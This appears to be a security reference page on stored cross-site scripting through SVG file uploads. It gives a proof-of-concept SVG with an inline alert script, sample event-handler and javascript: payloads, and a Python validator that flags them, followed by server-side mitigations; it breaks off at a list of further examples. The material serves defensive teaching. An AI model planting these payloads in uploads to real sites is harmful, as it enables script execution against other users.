XSS via SVG file upload

SVG is an XML format that can carry executable content: <script> elements, on* event-handler attributes and javascript: links. That script runs when the browser renders the SVG as a document, that is, when a user opens the uploaded file directly or when it is embedded with <object>, <embed> or <iframe>. Loaded through an <img> tag or as a CSS background image, scripts inside an SVG do not execute. If an upload endpoint stores the file and serves it from the application's own origin with Content-Type: image/svg+xml, opening it executes the script in that origin, which is a stored XSS.

Example

SVG with inline script tag

```xml
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
   <rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">
      alert(document.domain)
   </script>
</svg>
```
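The following is an added example, not code from the original page, showing the server-side check an upload handler would run against the payload above. It parses the SVG as XML and reports the constructs that turn an image into a script: <script> elements, on* event-handler attributes, javascript: URLs in href/xlink:href (with the whitespace and case tricks browsers tolerate) and <foreignObject>. The function name svg_findings and the three sample documents are constructed for this example; the first sample is the inline-script payload from the page.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the inline-script payload shown on the page.
SCRIPT_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
   <rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">
      alert(document.domain)
   </script>
</svg>"""

# Constructed sample: no <script>, but an event handler and an obfuscated javascript: link.
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href=" JavaScript:alert(1)"><circle r="10" onclick="alert(1)"/></a>
</svg>"""

# Constructed sample: a benign icon that a filter must let through.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" fill="#000"/>
</svg>"""


def _local(name: str) -> str:
    """Strip ElementTree's '{namespace}local' form down to the local name."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG should be rejected (empty list if none).

    Flags <script> and <foreignObject> elements, on* event-handler attributes and
    javascript: URLs in href/xlink:href. A document that is not well-formed XML is
    rejected outright rather than guessed at.

    Note: xml.etree does not resolve external entities, but for untrusted input in
    production the parse should go through defusedxml to also block entity-expansion
    (billion laughs) attacks.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings: list[str] = []
    for elem in root.iter():
        tag = _local(elem.tag).lower()
        if tag == "script":
            findings.append("<script> element")
        elif tag == "foreignobject":
            # <foreignObject> lets arbitrary XHTML (including <script>) into the image.
            findings.append("<foreignObject> element")
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                findings.append(f"event handler attribute {name}=")
            elif name == "href":
                # Browsers ignore leading/embedded whitespace and scheme case,
                # so " JavaScript:" and "java\tscript:" both execute. Normalise first.
                normalised = "".join(value.split()).lower()
                if normalised.startswith("javascript:"):
                    findings.append(f"javascript: URL in {_local(attr)}")
    return findings


if __name__ == "__main__":
    for label, doc in (("script", SCRIPT_SVG), ("handler", HANDLER_SVG), ("clean", CLEAN_SVG)):
        print(label, svg_findings(doc))
```

This is a reject-list check, not a sanitizer: it catches the common vectors but not, for example, scripts pulled in through <use> or <image> references to external documents, so it belongs next to the two controls that remove the impact regardless of content, serving uploads with Content-Disposition: attachment (or from a separate, cookie-less origin) or rasterizing SVG uploads to PNG before storage.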

More examples

Find more inspiration in the test cases of SVG sanitizing libraries, such as: